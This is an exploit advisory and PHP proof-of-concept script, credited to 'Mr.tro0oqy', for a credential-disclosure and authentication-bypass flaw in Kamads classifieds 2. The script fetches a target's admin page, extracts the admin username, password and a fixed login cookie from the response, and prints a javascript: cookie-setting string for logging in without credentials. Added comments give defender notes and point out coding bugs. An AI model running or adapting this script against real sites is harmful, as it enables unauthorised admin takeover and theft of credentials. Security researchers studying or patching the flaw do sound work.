Kamads classifieds 2 Admin Disclosure & Auth bypass

2012.08.09
Credit: Mr.tro0oqy
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

<?php
/*
 * Proof-of-concept for the advisory above. It sends one request to the URL
 * given as the first command-line argument and prints the parts of the
 * response body that follow the markers "username = ", "theCookieName" and
 * "theCookieValue".
 *
 * What the markers imply (inferred from this script only; confirm against the
 * application source): the admin page returns the admin credentials and a
 * fixed cookie name/value pair in its body to a request that carries no
 * session, and presumably treats that cookie alone as proof of login.
 *
 * Defender notes:
 *  - The admin page should produce no output before a server-side
 *    authentication check, and should never render credentials or
 *    cookie constants into the response.
 *  - A login cookie should be a random, per-session, server-issued value,
 *    not a constant that can be read from a page.
 *  - For log review: the request uses the fixed User-Agent string set below
 *    and targets the admin script directly with no prior login request.
 */
if ($argc < 2) {
    // No target argument: print the banner and usage text, then exit.
    echo "\n+-----------------------------------------------------------------+\n";
    echo "| Kamads classifieds V2 admin Disclosure & (AuthBypass) insecure exploit |\n";
    echo "| By Mr.tro0oqy |\n";
    echo "| uxxd@hotmail.com |\n";
    echo "+-----------------------------------------------------------------+\n";
    print "\nUsage........: php $argv[0] <host><path><admin.php>\n";
    print "\nex...........: php $argv[0] http://www.target.com/V2A_XHTML/admin/admin.php\n";
    die();
}else {
    // Single request to the supplied URL; the body is returned as a string.
    $ch = curl_init();
    curl_setopt($ch,CURLOPT_URL,"$argv[1]");
    // $op1 holds curl_setopt's return value and is never read afterwards.
    $op1 = curl_setopt($ch,CURLOPT_RETURNTRANSFER,true);
    // Fixed User-Agent; usable as a (weak) indicator in web server logs.
    curl_setopt($ch,CURLOPT_USERAGENT,"Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)");
    // NOTE(review): COOKIESESSION and CUSTOMREQUEST are written without the
    // CURLOPT_ prefix used on the other options, so they are not the cURL
    // option constants; how PHP treats the bare names depends on the PHP
    // version, and the script may stop here.
    curl_setopt($ch,COOKIESESSION,true);
    curl_setopt($ch,CUSTOMREQUEST,"get");
    // The result is not checked for failure (curl_exec returns false on error)
    // and the handle is never closed.
    $x = curl_exec($ch);
    // `and` binds more loosely than `=`, so $t receives the first stristr()
    // result (the body from "username = " onwards); the second stristr() only
    // gates the branch.
    if ($t = stristr($x,"username = ") and stristr($x,"password = ")) {
        echo "\n";
        echo "\n";
        // Prints the first 94 bytes starting at "username = ". The length is
        // hard-coded, so it presumably matches one specific page layout.
        echo $new = substr($t,0,94);
        if ($co=stristr($x,"theCookieName") and $co2=stristr($x,"theCookieValue")) {
            echo "\n";
            echo "\n";
            // Prints 35 bytes from "theCookieName" and 40 bytes from
            // "theCookieValue".
            echo $new2 = substr($co,0,35);
            echo "\n";
            echo $new3 =substr($co2,0,40);
            echo "\n";
            echo "\n";
            // Fixed offsets cut the name and the value out of those fragments;
            // they assume the exact spacing and quoting of the served page.
            $ja = substr($new2,17,15);
            echo "\n";
            $ja2 = substr($new3,18,18);
            echo "\n";
            echo "\n";
            echo "\n";
            // Only prints a javascript: URL string that would set the extracted
            // cookie with path=/; nothing further is sent to the server.
            echo $exploit = "javascript:document.cookie=\"$ja=$ja2;path=/\";";
            echo "\n";
            echo "\n";
            echo "\n";
        }
    }else {
        // Markers absent from the response (or the request failed).
        echo "not found";
    }
}
?>

